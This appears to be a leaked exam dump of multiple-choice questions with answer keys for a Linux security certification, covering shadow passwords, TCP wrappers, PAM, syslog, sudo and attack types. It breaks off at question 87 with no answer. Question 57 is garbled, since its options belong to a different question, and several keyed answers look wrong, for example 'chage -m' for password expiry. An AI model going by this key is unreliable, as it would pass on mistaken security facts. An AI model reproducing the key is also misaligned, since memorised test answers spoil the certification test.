Exam Name: Linux Security, Privacy & Ethics (Level 1)
Exam Type: SAIR
Exam Code: 3X0-104
Total Questions: 115
Question: 1
Kathryn wants to maximize security on her system by replacing ftpd with a program that logs
requests, denies unauthorized users, and runs the original ftpd daemon. What should Kathryn
use?
A. TCP wrappers
B. A VPN
C. Tripwire
D. Packet filters
Answer: A
Question: 2
John has just set up shadowing on his Linux machine. As root, he looks in the /etc/shadow file
and finds the line below. Which of the following is TRUE about the line he found?
jsmith:H7o12v$s:100:0:60:7:3::
A. The user jsmith's account has been disabled for 100 minutes.
B. The user jsmith's password can only be changed after the current password has been active
for 3 days.
C. The user jsmith will be warned for 60 days until his password expires.
D. The user jsmith's account will be disabled 3 days after his password expires.
Answer: D
Question: 3
John would like the finger daemon to be TCP wrapped. He finds the line below in the
/etc/inetd.conf file. How should he change this line to enable wrapping of the finger daemon?
finger stream tcp nowait nobody /usr/sbin/in.fingerd
A. finger stream tcpd nowait /usr/sbin/in.fingerd
B. finger stream tcp nowait /usr/sbin/tcpd in.fingerd
C. finger stream tcpd nowait /usr/sbin/tcpd finger
D. finger stream tcp nowait /usr/sbin/in.fingerd in.fingerd
Answer: B
Question: 4
Which of the following can be used to watch logged-in users as they execute commands?
A. ttysnoop
B. mgetty
C. sniffdev
D. urlsniff
Answer: A
Question: 5
Which of the following best describes how the Crack program breaks passwords?
A. It gathers passwords by masquerading as a Kerberalized login program.
B. It encrypts a list of dictionary words and compares it to passwords already encrypted on the
system.
C. It attempts to decrypt passwords that are already encrypted on the system.
© SelfExamEngine.com
D. It gathers plain-text information sent over the network and parses that information for
passwords.
Answer: B
Question: 6
The following is a listing from the /etc/passwd file. Which users have a user identification (UID) of
superuser?
johndoe:x:1:0::/home/johndoe:/bin/bash
tom:x:0:0::/home/tom:/bin/bash
beth:x:0:1::/home/beth:/bin/bash
carla:x:1:1::/home/carla:/bin/bash
A. johndoe and carla
B. tom and beth
C. johndoe and tom
D. beth and carla
Answer: B
Question: 7
Charles has been using PGP for file encryption for months and wants to expand its uses to other
projects. Which of the following would NOT be an effective use of PGP?
A. Creating public keys for user authentication
B. Encrypting company e-mail
C. Creating digital signatures
D. Encrypting the signing of SSL certificates
E. Creating private keys for user authentication
Answer: D
Question: 8
Molly wants to encrypt and send an e-mail containing sensitive material to Sandy. To ensure that
no one besides Sandy can read the e-mail, Molly wants to use PGP encryption. Which of the
following methods will allow Molly to encrypt the e-mail and provide a way for Sandy to decrypt it?
(Choose two.)
A. Molly gives a password at encryption time that Sandy can use to decrypt the e-mail.
B. Molly encrypts the e-mail using a private key. Sandy must then decrypt it using the public
key.
C. Molly encrypts the e-mail using a public key. Sandy must then decrypt it using the private
key.
D. Molly encrypts the e-mail using a series of private keys. Sandy then decrypts it using one of
the private keys sent along with the e-mail.
Answer: A, C
Question: 9
A cracker has obtained the /etc/passwd file from a large Server. In an attempt to gain entry
into the system, the cracker checks the encrypted passwords from /etc/passwd against a list of
encrypted passwords created from a word list. This is an example of a ________ attack.
A. dictionary
B. buffer overflow
C. brute force
D. smurf
E. spoof
Answer: A
Question: 10
An assistant network administrator has just been assigned the task of enhancing network
security. One of the options that he has to implement is password aging. Consider the excerpt
below from the /etc/passwd file. Which two commands can the network administrator run to make
jdoe's and msmith's passwords expire in 90 days? (Choose two.)
A. passwd -90 jdoe msmith
B. passwd -x 90 jdoe msmith
C. passwd --expire 90 jdoe msmith
D. crypt -m 90 jdoe msmith
E. chage -m 90 jdoe msmith
Answer: B, E
Question: 11
An assistant network administrator has just been assigned the task of enhancing network
security. One of the options to be implemented is password aging. Consider the excerpt from the
/etc/passwd file below. Which of the following would implement password aging?
A. shadow -x 90 jdoe msmith
B. pwconv; passwd -x 90 jdoe msmith
C. crypt; passwd -age 90 jdoe msmith
D. pwage -t 90 jdoe msmith
Answer: B
Question: 12
Tom, a system administrator for Server A, is interested in security and has written a script that
scans the password file for unauthorized promotion to root status. Which of the following should
the script check? (Choose two.)
A. A UID number that has been set to one
B. A UID number that has been set to zero
C. An account with the GID set to *
D. A user with a non-standard shell (i.e., "/bin/runasroot")
E. An account with the UID set to *
Answer: B, D
Question: 13
The line below is from an /etc/passwd file. What information does the presence of a single
character in the second field (an x in most cases) reveal about the password authentication
procedure?
john:x:500:100::/home/john:/bin/bash
A. Encoded passwords are stored in "/etc/shadow."
B. The administrator has locked this user's account.
C. The user's encrypted password is x.
D. The user's password hasn't been assigned.
Answer: A
Question: 14
A team's project leader, Joe, needs read and write permissions to all files created in the directory
/home/group1/shared, regardless of file ownership. Joe owns this directory. Which of the
following commands will set these permissions? The pwd is
/home/group1/shared. Assume Joe does not have root access.
A. setfacl -m d:u:joe:rwx *
B. chmod 777 *
C. umask 000 *
D. chown -D joe *
E. setuid -r joe *
Answer: A
Question: 15
Which file must be modified to set the default values for such items as password expiration and
super user PATH settings?
A. /etc/permissions
B. /etc/login.defs
C. /etc/smb.conf
D. /etc/defaults
Answer: B
Question: 16
Which of the following protocols transmit encrypted ASCII text by default?
A. POP
B. IMAP
C. FTP
D. Telnet
E. https
Answer: E
Question: 17
Tom is a developer in a Linux system. Due to the carelessness of the system administrator, he
obtains the superuser password. Tom decides to write a setuid program that would make him the
superuser even without the password, but he means no harm
to the company. He places the program in the /sbin directory. He also makes sure to touch the
program so that it has the same date as various other programs in that directory. Which of the
following are the most appropriate methods for the system administrator to detect the program?
(Choose two.)
A. Execute the find command to display program names with the setuid bit set.
B. Use a software package such as tripwire to detect changes in the directory structure.
C. Run a script that performs a "chmod -s" on all binaries in order to turn off setuid.
D. Check the /var/sulog file, as it contains entries that describe programs with the setuid bit set.
E. Execute the locate command with the subexecution of the stat command to determine the
true creation date of each file.
Answer: A, B
Question: 18
A large company has a network of computers in New York and a separate network in London.
The company president needs the two networks to act as one, but he does not want to lease an
expensive line between the two. Which of the following can the
company use to provide secure traffic between the two networks using the Internet?
A. VPN
B. LAN
C. TCP wrappers
D. WAN
E. Dual-homed host
Answer: A
Question: 19
William, a network administrator for a small marketing firm, wants to provide maximum security
for sensitive information on his network. To do this, he has decided to set up a closed path for
data transmission between two points on the network.
Which of the following network concepts is this an example of?
A. Ethernet bridge
B. TCP wrappers
C. Proxy Server
D. Tunneling
E. Encrypted sticky packets
Answer: D
Question: 20
Jim, who has recently been promoted to network administrator, wants to specify rules for routing.
However, he is unsure about how router packet filters parse and apply rules. Which of the
following are TRUE regarding router packet filtering? (Choose two.)
A. Rules are checked against packets by parsing the body of the packet for information in a way
similar to the method the grep program uses to parse text files.
B. The packet headers are parsed and tested against the routing rules.
C. Packet filtering rules can be applied to inbound and outbound network interfaces.
D. Router packet filters remove headers from packets and apply rules based on the content of
the packet.
Answer: B, C
Question: 21
An administrator has implemented a chain of router packet filtering rules on a major system
Server. A user has sent a packet to the network protected by the packet filter. The packet
originated from 190.15.65.0/24 and is destined for 212.220.0.0/16. Considering the chain of
packet filtering rules below, what will happen to the packet and why?
rule source destination action
A 190.15.60.0/24 212.220.0.0/16 deny
B 212.220.0.0/16 190.15.65.0/24 deny
C 190.15.0.0/16 212.220.0.0/16 permit
D 0.0.0.0/0 0.0.0.0/0 deny
A. The packet will be permitted because no rules apply.
B. The packet will be permitted because it matches rule C.
C. The packet will be denied because all sources and destinations are blocked by rule D.
D. The packet will be denied because the packet matches rule A.
Answer: B
Question: 22
The system administrator wants to log all of the kernel messages (e.g. kernel panics) to a file
instead of having the messages go to the console (e.g. /dev/console). Which file should she edit,
and what line in the file should she add, to perform this duty?
A. /etc/klog.conf; kern.* /var/log/kernel.log
B. /etc/logd; kernel.* /var/log/kernel.log
C. /etc/syslog.conf; *.notice /var/log/kernel.log
D. /etc/syslog.conf; kern.* /var/log/kernel.log
E. /etc/klog.conf; *.notice /var/log/kernel.log
Answer: D
Question: 23
An administrator believes that an unauthorized user has been attempting to connect to a system
Server. Where could the administrator look to find logs of connection attempts and the origins of
those connections?
A. /var/log/secure
B. /var/adm/sulog
C. /var/log/logins
D. /var/adm/connect
Answer: B
Question: 24
A large Server has many services running, including FTP, NFS, and NIS. It is hard for the
administrator to find security holes in the services' configuration files, and this leads to possible
security risks. Which of the following tools could the administrator use to check these services for
security holes?
A. NTOP
B. LogCheck
C. SAINT
D. Tripwire
Answer: C
Question: 25
On Monday, a system administrator for a Linux software company noticed more than 100 failed
Telnet login attempts to the same user from the IP address 25.25.25.25 on the same day. Which
action could he take to protect the user account and the system? (Choose two.)
A. Restart the computer to reset the TCP wrapper daemon.
B. Disable the account to prevent password guessing.
C. Reconfigure the /etc/hosts.deny file to block all access from this IP address.
D. Start a log of all failed passwords that are being used to review the type of passwords that
are being guessed.
Answer: B, C
Question: 26
Which file contains configuration information for the logging daemon, specifies a pattern of
facilities to be logged, a logging priority, and where the logs are stored?
A. /etc/inittab
B. /etc/inetd.conf
C. /etc/syslog.conf
D. /etc/sysconfig/log.conf
E. /etc/modules.conf
Answer: C
Question: 27
Which of the following describes the contents of the /var/log/btmp log file?
A. It stores only the users' real names and their login times.
B. It contains a list of failed login attempts in a format similar to the wtmp log file.
C. It contains all successful superuser login attempts.
D. It contains a list of all users currently logged in to the system, along with their IP addresses.
Answer: B
Question: 28
An assistant network administrator has just been assigned the task of enhancing network
security. Some of his ideas had involved a daily check of the system. A script that has been
created will be executed daily as a cron job. Which of the following "find" commands might be
included in this script? (Choose two.)
A. find / -perm +4000 >> /var/log/daily
B. find / -mtime 1 >> /var/log/daily
C. find / -exec md5sum -c {} \; >> /var/log/daily
D. find / -name * >> /var/log/daily
E. find / -type s >> /var/log/daily
Answer: A, B
Question: 29
An administrator finds a program on a network Server that modifies several system service
records when a certain user logs in and out. The program masks the intruder's actions. This is
most likely an example of a _________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: D
Question: 30
An administrator finds that the Telnet daemon is listening on two ports. Any user who connects to
the non-standard port will be granted immediate access. This is an example of a __________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: C
Question: 31
An administrator finds a program on a network Server that has used Sendmail to propagate
itself by sending copies of the program to many remote Servers. Though the program itself does
not contain malicious code, it has caused the Server to slow
down because it has consumed large amounts of network and processor resources. This is most
likely an example of a __________.
A. Trojan horse
B. Worm
C. Back door
D. Logic bomb
Answer: B
Question: 32
A malicious user has sent thousands of TCP connection requests to a Server from various
forged IPs. The Server does not receive acknowledgments from any of the requesting clients
because they do not exist. The massive strain on the Server causes
it to crash. This is an example of what type of Denial of Service (DoS) attack?
A. SYN flood
B. ICMP flood
C. Smurf attack
D. Buffer overflow
Answer: A
Question: 33
A malicious user has spoofed his IP address, making it appear that he is using another machine,
called machine 2. The user now broadcasts a forged ping request out to an entire network of
machines. Machine 2 is hit with a large number of pings at
one time, resetting its connection. This is most likely an example of what type of Denial of Service
(DoS) attack?
A. SYN flood
B. Buffer overflow
C. Smurf attack
D. Logic bomb
Answer: C
Question: 34
Michael, a software developer at a reputable computer firm, has written a program that will
damage the firm's computer systems if he is fired. Once the program is installed, it will be totally
inactive unless Michael's account is removed from the system or is inactive for more than 14
days. Which of the following describes the type of software that Michael has created?
A. Trojan horse
B. Worm
C. Back door
D. Logic Bomb
Answer: D
Question: 35
Macro Comm Inc., a new wireless communications company, has decided to use Linux as its
operating system. The system administrators have taken many precautions to ensure that the
Servers are secure. Which of the following can pose a threat to
the system's security? Assume all employees have physical access to the Server.
A. The Server's case is padlocked, but a floppy drive and CD-ROM are accessible on the
machine.
B. There are no floppy drives or CD-ROM drives on the Server, but the case is not locked.
C. The case is not locked, but there is a BIOS password to ensure that the floppy, CD-ROM,
and network cannot be booted.
D. The Server's case is unlocked, and the floppy drive is the first boot option in the BIOS.
E. All of the above
Answer: E
Question: 36
Tom is a system administrator for Linux Server A. Tom is running a Perl script that will initiate a
connection request from Server A to Server B without completing the network connection. This is
done multiple times until Server B can no longer
communicate on the network. What kind of attack has Tom initiated?
A. Spam blast
B. TCP bomb
C. Denial of Service
D. Internet Worm
Answer: C
Question: 37
Before Linux site sets up its Network, it develops its Network Policy. Which of the following is
NOT a reason why Linux site should have a Network Policy set up?
A. It will inform the users of the appropriate use of the system.
B. It will provide Linux site with liability protection if illegal activities are performed on their site
without their knowledge.
C. It will block unauthorized users from accessing the network.
D. It will provide Linux site with a standard way to deal with problems concerning the Network.
Answer: C
Question: 38
The system administrator needs to set the existing user jsmith's home directory to
/mnt/home/jsmith. Which of the following commands can she use to do this?
A. useradd
B. setenv
C. vigr
D. usermod
Answer: D
Question: 39
A cracker has been trying to get into a system's password file so she can use a program to
decrypt the passwords that are stored there. The system that she is trying to crack has
shadowing enabled. How will this help prevent the cracker from cracking the root password?
A. Shadowing stores encrypted passwords in the /etc/shadow file, which only root can access.
B. Shadowing encrypts passwords that have already been encrypted, making them harder to
crack.
C. Shadowing encrypts passwords and stores a public key in the /etc/shadow file. Only users
with the private key can access these passwords.
D. Shadowing changes permissions on the /etc/passwd file so that only root can read it.
Answer: A
Question: 40
The system administrator has just been notified that the user btomlin will not be accessing the
local network by any means for the next six months because he will be out of town. How can the
system administrator disable btomlin's account without deleting it? (Assume that shadow
passwords are used.)
A. Remove the encrypted password from the /etc/shadow file.
B. Remove the shell field from btomlin's /etc/passwd file entry.
C. Issue the command "chmod 000 /home/btomlin."
D. Place an asterisk (*) in front of the encrypted password in the /etc/shadow file.
Answer: D
Question: 41
Jim is using pam.conf to configure his pluggable authentication modules (PAM). He has many
services that use authentication and is having trouble maintaining the pam.conf file. What can Jim
do to make the administration of PAM easier?
A. Use multiple pam.conf files to manage authentication.
B. Use the pam.d directory structure, which uses multiple configuration files named for the
services they configure.
C. Instead of using PAM, configure each service for its own authentication.
D. Use the /etc/pam.d/other file to authenticate, using the pam_deny.so module.
Answer: B
Question: 42
John has accidentally deleted his pam.d directory and does not have a pam.conf file on his
machine. Because there is no configuration for authentication, all attempts to log in will fail. John
boots in single user mode and creates the /etc/pam.d/other file shown below. What effect will
these lines have on the system?
auth required /lib/security/pam_permit.so
account required /lib/security/pam_permit.so
password required /lib/security/pam_permit.so
session required /lib/security/pam_permit.so
A. This will allow all users except auth, account, password, and session to log in without a
password.
B. This will allow only the users auth, account, password, and session to log in without a
password.
C. This will allow all users except root to log in without a password.
D. This will allow all users to log in without a password.
Answer: D
Question: 43
Elvis is looking in the /etc/securetty file and finds the lines below. What do these lines indicate?
tty1
tty2
tty3
tty4
A. Root can only log in to the first four virtual terminals.
B. Only the first four virtual terminals will be secure.
C. Only the first four virtual terminals will be open.
D. Root cannot log in to the first four virtual terminals.
E. Remote connections to the first four virtual terminals will be encrypted.
Answer: A
Question: 44
Billy needs to prevent the user gmogley from using the FTP service. Billy creates the file
/etc/ftpusers. How must he edit the /etc/pam.d/ftp file to prevent gmogley from using FTP?
A. Add the line: auth required /lib/security/pam_listfile.so\ onerr=fail item=user sense=succeed
file=/etc/passwd
B. Add the line: auth sufficient /lib/security/pam_secureftp.so \ onerr=fail item=user sense=deny
file=/etc/ftpusers
C. Add the line: auth required /lib/security/pam_listfile.so \ onerr=succeed item=user
sense=deny file=/etc/ftpusers
D. Add the line: auth sufficient /lib/security/pam_secureftp.so \ onerr=succeed item=user
sense=deny file=/etc/passwd
Answer: C
Question: 45
Sheila wants her machine to check her account for new mail each time she logs in. Which PAM
configuration file should she edit, and which line should she add to this file to achieve this?
A. /etc/pam.d/login auth optional pam_checkmail.so
B. etc/pam.d/rlogin auth optional pam_mail.so
C. /etc/pam.d/rlogin auth optional pam_checkmail.so
D. /etc/pam.d/login auth optional pam_mail.so
Answer: D
Question: 46
Jerry has just finished editing the /etc/syslog.conf file to send all system messages to tty12 by
adding the line "*.* /dev/tty12". After saving the file and closing his editor he switches to tty12 but
sees no messages. What is the reason for this?
A. Jerry has put the syslog.conf file in the wrong place.
B. The syslogd must be restarted before it will read any changes made in the syslog.conf file.
C. The line added should read "*.* @tty12".
D. The line added should read "ALL /dev/tty12".
Answer: B
Question: 47
Omar would like all private authentication messages to be logged to a remote machine named
log.linuxsite.org. Which of the following lines, when added to the syslog.conf file, will achieve
this?
A. authpriv.* @log.linuxsite.org
B. *.authpriv @log.linuxsite.org
C. authpriv.* log.linuxsite.org
D. *.authpriv log.linuxsite.org
Answer: A
Question: 48
syslogd can be used to log messages based on the message priority. Which of the following is
NOT a valid priority that can be set in the syslogd configuration file?
A. warning
B. debug
C. err
D. system
E. info
Answer: D
Question: 49
Given the code below from an /etc/syslog.conf file, which of the following lines is invalid?
1 kern.* /dev/console
2 *.emerg;local3.none *
3 *.mail |/var/log/maillog
4 authpriv.* @log.somedomain.com
5 local7.* /var/log/boot.log
A. 1
B. 2
C. 3
D. 4
E. 5
Answer: C
Question: 50
A system administrator wants to log all error level kernel messages to the remote system
"loghost.somedomain.com". In order to do this, which of the following lines should be added to
/etc/syslog.conf?
A. err.kern loghost.somedomain.com
B. err.kern | mail [email protected]
C. err.kern REMOTE loghost.somedomain.com
D. kern.err @loghost.somedomain.com
E. kern.err | mail [email protected]
Answer: D
Question: 51
syslogd can write a logfile directly to all of the following destinations except a _______.
A. named pipe
B. virtual terminal
C. remote host
D. compressed file
E. file
Answer: D
Question: 52
Why would a system administrator want to use the Sudo program in a workplace where many
changes need to be made with root privileges?
A. Using Sudo will keep track of all the changes that are made by root, making it easier for the
administrator to go back and fix mistakes.
B. Using Sudo will allow non-root users specified in its configuration file to run certain programs
as root.
C. Sudo allows specified programs to run as root at certain time intervals
D. Sudo logs all attempted switch user (su) attempts.
Answer: B
Question: 53
Which of the following is NOT a function of TCP Wrapper?
A. It prevents unauthorized hosts from accessing network services on a system.
B. It allows authorized hosts to access network services on a system.
C. It secures all network services listed in /etc/services.
D. It listens for incoming connections to services listed in inetd.conf that specify tcpd.
Answer: C
Question: 54
The lines below are in the /etc/hosts.allow file for linuxsite.org. Which of the following is TRUE?
(Assume the hosts.deny file contains the line ALL:ALL.)
#hosts.allow
telnetd:.linuxsite.org EXCEPT log.linuxsite.org
ftpd: web.linuxsite.org
ALL:LOCAL
A. All hosts at linuxsite.org can use the telnetd service.
B. log.linuxsite.org cannot use the ftpd service.
C. web.linuxsite.org cannot use the telnetd service.
D. Only web.linuxsite.org can use the ftpd service.
Answer: D
Question: 55
Two of the TCP wrapper files are /etc/hosts.allow and /etc/hosts.deny. Which of the following best
describes how authentication is performed using TCP wrappers?
A. The rules in /etc/hosts.deny are checked first. If a connection matches any of the rules, it is
denied.
B. The rules in /etc/hosts.allow are checked first. If a connection matches any of the rules, then
it is allowed.
C. The rules in /etc/hosts.deny are checked first. If a connection matches any of the rules, then it
is denied unless it matches a rule in /etc/hosts.allow.
D. The rules in /etc/hosts.allow are checked first. If a connection matches any of the rules, then
it is allowed unless it matches a rule in /etc/hosts.deny.
Answer: B
Question: 56
Which rule may be added to the /etc/hosts.deny file in order to deny all requests for inetd initiated
services on a system?
Assume /etc/hosts.allow is empty.
A. ALL: ALL
B. INETD:ALL
C. DENY: ALL
D. DENY: 0.0.0.0/255.255.255.255
Answer: A
Question: 57
Assume that the hosts.allow file is set to "ALL: .linuxsite.org" and the hosts.deny file is "ALL:ALL".
If Server .linuxsite.org initiates an FTP transfer using TCP wrappers, what will be the initial
response of the Server?
A. Edit /etc/inittab so the system always boots to runlevel 5.
B. Disable inetd in the startup scripts.
C. Delete the /etc/passwd file.
D. Enable only services that are needed and disable all unnecessary services.
Answer: D
Question: 58
Jerry is setting up a firewall for a Local Area Network (LAN), and he wishes to use the firewall as
the default gateway for the LAN. In order to do this, which of the following MUST Jerry do to the
packets coming from the LAN to the firewall?
A. Forward
B. Sniff
C. Deny
D. Mangle
E. Encapsulate
Answer: A
Question: 59
Arnold wants to check the integrity on certain files on his Linux system. Which of the following
commands can Arnold use to display the checksum and blocksize of a specified file?
A. md5sum
B. stat
C. file
D. sum
E. cksum
Answer: D
Question: 60
Tom created checksums on five files in his home directory (file1, file2, file3, file4, file5). The
contents of this file (checksums.txt) are shown below. Which of the following is TRUE concerning
this scenario?
134a1f6f730855f9ed52748433d5672e file1
4512fbedda42a2fbbee52309d6e3142d file2
728ea00889f16f26da54b0f40adc54e0 file3
6ebd7fe47b6659d0cd0e2c874fd5e862 file4
79182eaf49fa9c76e193aa2bac277bc9 file5
A. The five files in Tom's home directory must be plain text because checksums cannot be
performed on binary files.
B. The command md5sum file* > checksums.txt is a valid way to create checksums.txt.
C. The file checksums.txt contains 64 bit checksums.
D. The integrity of these files can be checked by issuing the command cksum -c checksums.txt.
Answer: B
Question: 61
A user on a Linux box needs to scan the machine for open TCP ports. Assuming the user does
not have root access, which of the following nmap options should she use to do this?
A. nmap -sT localhost
B. nmap -sF localhost
C. nmap -sA localhost
D. nmap -sU localhost
E. nmap -sS localhost
Answer: A
Question: 62
Dexter wants to secure his workstation, but he does not want to log out. Which of the following
utilities will allow him to do this? (Choose two.)
A. xlock
B. vlock
C. screen
D. mouselock
E. klub
Answer: A, B
Question: 63
Fred issues the command "gpg --list-keys" and receives the output below. Fred wants to publish a
text version of his public key. Which of the following commands will accomplish his task?
/home/fred/.gnupg/pubring.gpg
---------------------------------
pub 1024D/94E5A9AB 2001-08-14 Fred Smith (none)
sub 1024g/3AB100B5 2001-08-14
A. gpg --export [email protected] --armor fredspk > fredspk
B. gpg --output fredspk.gpg --symmetric fredspk --export [email protected]
C. gpg --output fredspk --export [email protected]
D. gpg --armor --export [email protected] > fredspk
Answer: D
Question: 64
Mary and Jack are both using public-key cryptography. Jack wants to send a private text
message to Mary. He encrypts the message using Mary's public key. Mary opens the file and
sees the text below. Mary will decrypt this message using _______.
-----BEGIN PGP MESSAGE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
-----END PGP MESSAGE-----
A. Jack's public key
B. Jack's private key
C. her public key
D. her private key
Answer: D
Question: 65
Aristotle, a system administrator, is curious about some of the traffic coming through his proxy
Server. Which of the following utilities can Aristotle use to show packet headers and contents
transmitted to and from "eth0" on his proxy Server?
A. portmap
B. sniffit
C. urlsnarf
D. ttysnoop
Answer: B
Question: 66
Antonio wants to sniff incoming and outgoing packets on his network. Which of the following will
allow him to view multiple connections interactively?
A. tcpdump -i
B. ttysnoop -i
C. sniffit -i
D. portmap -i
Answer: C
Question: 67
Consider the output below. Which of the following commands most likely produced this output?
3:40pm up 10 days, 1:27, 16 users, load average: 0.00, 0.00, 0.00
USER     TTY    FROM           LOGIN@   IDLE    JCPU    PCPU    WHAT
jojo31   pts/0  192.168.1.9    12:20pm  47:57   0.21s   0.02s   screen -x
jimmy9   pts/1  192.168.5.32   1:19pm   39.00s  18.66s  18.66s  vi prog6.c
eegeor   pts/2  192.168.89.90  1:20pm   8days   0.19s   0.19s   /bin/bash
A. uptime
B. ps aux
C. who
D. w
Answer: D
Question: 68
For security reasons, Julius wants to delete the file that logs failed login attempts. He has deleted
the /var/log/wtmp file, but when "lastb" is run, failed login attempts are still displayed. Which of the
following is most likely the problem?
A. Failed login attempts are not stored in /var/log/wtmp; they are stored in /var/log/messages.
B. lastb makes backups of /var/log/wtmp, so those must be deleted as well.
C. syslogd does not allow these files to be deleted; logs of failed login attempts are required for
syslogd to function properly.
D. Failed login attempts are not stored in /var/log/wtmp; they are stored in /var/log/btmp.
Answer: D
Question: 69
Greg is doing some routine cleaning on his Linux machine and notices a file that he is not familiar
with called /var/log/pacct. It is set so only root can read from or write to the file. Which of the
following commands makes use of this file?
A. last
B. lastb
C. who
D. w
E. lastcomm
Answer: E
Question: 70
Where can a non-root user find information, such as usernames, to break into user accounts?
(Choose two.)
A. /etc/login.defs
B. /etc/passwd
C. /etc/issue
D. /etc/group
E. /etc/shadow
Answer: B, D
Question: 71
The system administrator needs to see the list of users who have logged in and out on their
machines and the times when they did so. Which command searches the /var/log/wtmp file and
displays who has logged on to the machine and the time?
A. who
B. wtmp
C. lastb
D. last
Answer: D
Question: 72
Jerome needs a way to ensure that only certain users can use sudo. He wants user1, user2, and
user3 to be able to run ls, mkdir, and chown. He has added the lines below to the /etc/sudoers
file. What is wrong with these lines?
Runas_Alias SUDO_ALIAS1 = user1, user2, user3
Cmnd_Alias COMMANDS = /bin/ls,/bin/mkdir,/bin/chown
SUDO_ALIAS1 ALL = COMMANDS
A. The Cmnd_Alias line should read "Cmnd_Alias SUDO_ALIAS1 : user1, user2, user3"
B. The Runas_Alias line should read "User_Alias SUDO_ALIAS1 = user1, user2, user3"
C. The SUDO_ALIAS1 line should read "SUDO_ALIAS ALL : ALL"
D. Nothing is wrong; these lines of code will do exactly what Jerome needs them to do.
Answer: B
Question: 73
User johnny5 attempts to execute the command "sudo /bin/ls" and receives the error, "Sorry, user
johnny5 is not allowed to execute "/bin/ls" as root on machine.work.com." Which of the following
is most likely the problem?
A. johnny5 is not in the "/etc/sudoers" file.
B. johnny5 is in the "/etc/sudoers" file, but he is not authorized to run "/bin/ls" as root.
C. sudo is not installed on machine.work.com
D. johnny5 is not a valid user on this system.
Answer: B
Question: 74
Which of the following best contrasts secure copy (scp) and FTP?
A. Scp provides more security with less overhead.
B. Scp provides more security with more overhead.
C. Scp provides less security with more overhead.
D. Scp provides less security with less overhead.
Answer: B
Question: 75
Stephen wants to run Mozilla from the remote machine system2, which has X-forwarding
enabled. Which of the following commands, run locally, will enable Stephen to run Mozilla on
system2 and forward the X display to his local machine?
A. mozilla --display system2:0
B. export DISPLAY=localhost:0
C. ssh -X system2
D. xhost +localhost
Answer: C
Question: 76
What will the following command do?
$ ssh -l jzero box2 uptime
A. ssh to a machine named 'box2' as user 'jzero' and execute the uptime command
B. ssh to a machine named 'jzero' as user 'box2' and execute the uptime command
C. Create an interactive login session on box2
D. Nothing; the command has a syntax error
Answer: A
Question: 77
Jimmy wants to write a script to securely transfer a number of files from a remote machine to his
current machine. Which of the following does he need to use?
A. scp
B. ftp
C. wget
D. https
Answer: A
Question: 78
Rex, a system administrator, wants to manually add some users to the /etc/passwd file. Which of
the following is considered a safe way to edit this file?
A. vim /etc/passwd
B. pico /etc/passwd
C. passwd
D. vipw
E. pwconv
Answer: D
Question: 79
Joline is using the vigr command to edit a file on her Linux machine. Which of the following files is
this command used to edit?
A. /etc/passwd
B. /etc/sudoers
C. /etc/inetd.conf
D. /etc/group
Answer: D
Question: 80
Tonya, a Bash user, wants to automatically log out after 5 minutes of inactivity. She has added
the line "set autologout=5" to her .bashrc file. She notices that after 10 minutes of inactivity, she
still has not been logged out. Which of the following is most likely the problem?
A. The autologout variable reads seconds, not minutes. The minimum is 60 seconds.
B. autologout has to be capitalized in the .bashrc file for it to take effect.
C. This line must be put in the .bash_profile file, not the .bashrc file.
D. In Bash the TMOUT variable must be set, not the autologout variable.
Answer: D
Question: 81
Which of the following are used to monitor log files and notify users of unusual logfile entries?
(Choose two.)
A. LogRotate
B. LogCheck
C. swatch
D. cron
E. Logwatch
Answer: B, C
Question: 82
Sam, a system administrator, is configuring a Kerberos Key Distribution Center (KDC) on a
server. All of the Kerberos software is installed correctly on the clients and the server. She now
wants to create a database to store all of the principal names and passwords. The name of her
local realm is LINUXSITE.ORG. Which of the following should Sam do to accomplish this?
A. Include the line "LINUXSITE.ORG ={ master_database_type = des-cdb-crc }" in the kdc.conf
file.
B. Include the line "LINUXSITE.ORG = { kdc = kerberos.LINUXSITE.ORG:88}" in the krb5.conf
file.
C. Run the command "kinit --create -f [email protected]".
D. Run the command "kdb5_util create -r LINUXSITE.ORG -s".
Answer: D
Question: 83
A company has just installed Linux on a computer system. This computer will be used exclusively
as a mail server, a Network File System (NFS) server, and a Network Information Services
(NIS) server. The system administrator wishes to secure the server by disabling all unnecessary
daemons. Which of the following are unnecessary daemons that should be disabled to better
secure the server? (Choose three.)
A. nmbd
B. apmd
C. rpc.usersd
D. wu.ftpd
E. portmap
F. ypbind
Answer: A, B, D
Question: 84
Beth logs into a remote machine as shown below. Beth is most likely using which of the
following?
login: beth
otp-md5 469 kb63492
Response: HOW NOW BROWN COW TOO LATE
Last login: Fri May 19 11:57:48 from host1
A. Shadow passwords
B. One-time Password in Everything (OPIE)
C. GPG/PGP
D. A static password system
E. A Trojan horse
Answer: B
Question: 85
Blake, a system administrator, is using the LogCheck program to monitor log files on the machine
host1. He receives the e-mail below from LogCheck. Which of the following conclusions can be
made concerning the information in Blake's e-mail?
Security Violations
-------------
May 20 11:34:13 host1 PAM_unix[26354]: authentication failure; amp (uid=1003) -> root for su service
May 20 11:34:56 host1 su[26354]: pam_authenticate: Authentication failure
Unusual System Events
---------------
May 20 11:34:03 host1 sshd[26346]: Accepted password for amp from 192.168.1.100 port 988
May 20 11:34:03 host1 PAM_unix[26346]: (ssh) session opened for user amp by (uid=0)
May 20 11:34:13 host1 PAM_unix[26354]: authentication failure; amp (uid=1003) -> root for su service
May 20 11:34:56 host1 su[26354]: pam_authenticate: Authentication failure
May 20 11:35:01 host1 su[26354]: - pts/3 amp-root
A. On May 20 at 11:34, the user amp successfully changed his UID to 0 on host1, but the PAM
authentication module was not loaded.
B. On May 20 at 11:34, the user amp tried to log in to host1 but failed.
C. The word "failure" could be in host1's logcheck.hacking file.
D. The word "amp" could be in host1's logcheck.ignore file.
Answer: C
Question: 86
Jake has the lines below in his tw.config file. Which of the following is TRUE concerning this file?
Assume Jake's machine has only two partitions: root (/) and swap.
@@define DEVSEARCH E+ins
@@define TMPSEARCH E+ugp
@@define LOGSEARCH L-i
/R
!/var
A. If a rootkit is placed in /usr/var, Tripwire will not catch it.
B. If a rootkit is placed in /opt/var, Tripwire will not catch it.
C. If a rootkit is placed in /etc/local/var, Tripwire will not catch it.
D. If a rootkit is placed in /var/log, Tripwire will not catch it.
Answer: D
Question: 87
Anne is a system administrator. She wants to be able to tell when an unauthorized user has
modified files on her system. Which of the following programs will allow Anne to do this?
A. Sysmon
B. SATAN
C. Tripwire
D. PortSentry
